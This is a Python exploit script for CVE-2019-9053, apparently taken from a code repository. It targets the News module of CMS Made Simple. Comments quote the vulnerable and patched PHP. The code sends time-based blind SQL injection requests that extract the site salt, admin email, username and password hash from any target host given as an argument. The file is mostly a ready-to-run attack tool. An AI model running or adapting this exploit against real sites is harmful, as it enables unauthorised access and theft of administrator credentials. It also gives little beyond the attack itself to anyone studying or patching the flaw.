CVE-2019-9053-2.py 4.03 KB
Newer Older
kubeworm's avatar
tools  
kubeworm committed
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
#!/usr/bin/env python3

# Before CVE-2019-9053

#    if( isset($params['idlist']) ) {
#        $idlist = $params['idlist'];
#        if( is_string($idlist) ) {
#            $tmp = explode(',',$idlist);
#            for( $i = 0; $i < count($tmp); $i++ ) {
#                $tmp[$i] = (int)$tmp[$i];
#                if( $tmp[$i] < 1 ) unset($tmp[$i]);
#            }
#            $idlist = array_unique($tmp);
#            $query1 .= ' (mn.news_id IN ('.implode(',',$idlist).')) AND ';
#        }
#    }

# After CVE-2019-9053

#    if( isset($params['idlist']) ) {
#        $idlist = $params['idlist'];
#        if( is_string($idlist) ) {
#            $tmp = explode(',',$idlist);
#            $idlist = [];
#            for( $i = 0; $i < count($tmp); $i++ ) {
#                $val = (int)$tmp[$i];
#                if( $val > 0 && !in_array($val,$idlist) ) $idlist[] = $val;
#            }
#        }
#        if( !empty($idlist) ) $query1 .= ' (mn.news_id IN ('.implode(',',$idlist).')) AND ';
#    }

# only check it if it's a string. things can only be strings and ints, right? ... theres nothing out there that implodes and isnt an int or a string.

import requests
from time import perf_counter as clock
import string
from binascii import hexlify
req = requests.Session()
def get_it(url_fmt, host, interval, charset):
    from random import shuffle
    from sys import stdout
    it = b''
    while True:
        l = list(charset)
        shuffle(l)
        charset = ''.join(l)
        found = False
        for x in (charset).encode('utf-8'):
            guess = it + bytes([x])
            print('\r[i] Guess: {}'.format(guess.decode('utf-8')), end='')
            stdout.flush()
            guess_url = url_fmt.format(host, interval, hexlify(guess).decode('utf-8'))
            start = clock()
            res = req.get(guess_url)
            end = clock()
            delta = end - start
            if delta > interval:
                it = guess
                found = True
                break
        if found == False:
            print('\r[+] No further matches, we got: {}'.format(it.decode('utf-8').lower()))
            return

def main():
    from sys import argv
    from math import ceil
    args = argv[1:] #                                                                  v-- bah gawd...is that Array()'s music I hear?!
    salt_target =     'http://{}/moduleinterface.php?mact=News,m1_,default,0&m1_idlist[]=1))+and+(select+sleep({})+from+cms_siteprefs+where+sitepref_value+like+0x{}25+and+sitepref_name+like+0x736974656d61736b)+--+'
    password_target = 'http://{}/moduleinterface.php?mact=News,m1_,default,0&m1_idlist[]=1))+and+(select+sleep({})+from+cms_users+where+password+like+0x{}25+and+user_id+like+0x31)+--+'
    email_target  =   'http://{}/moduleinterface.php?mact=News,m1_,default,0&m1_idlist[]=1))+and+(select+sleep({})+from+cms_users+where+email+like+0x{}25+and+user_id+like+0x31)+--+'
    username_target = 'http://{}/moduleinterface.php?mact=News,m1_,default,0&m1_idlist[]=1))+and+(select+sleep({})+from+cms_users+where+username+like+0x{}25+and+user_id+like+0x31)+--+'
    for arg in args:
        req.get('http://{}/moduleinterface.php'.format(arg)) # avoid weid delay?
        start = clock()
        req.get('http://{}/moduleinterface.php'.format(arg))
        end = clock()
        delta = end - start
        delay = int(ceil(delta * 10))
        print('[i] Pre-flight Request Time: {}'.format(delta))
        print('[i] Guessed suitably safe sleep delay: {}'.format(delay))
        print('[i] Getting cryptographic salt/seed for {}'.format(arg))
        get_it(salt_target, arg, delay, string.hexdigits)
        print('[i] Getting admin email address for {}'.format(arg))
        get_it(email_target, arg, delay, string.ascii_letters+string.digits+"@.-+")
        print('[i] Getting admin username for {}'.format(arg))
        get_it(username_target, arg, delay, string.ascii_letters+string.digits+"@.-+")
        print('[i] Getting admin password hash for {}'.format(arg))
        get_it(password_target, arg, delay, string.hexdigits)

if __name__ == '__main__':
    main()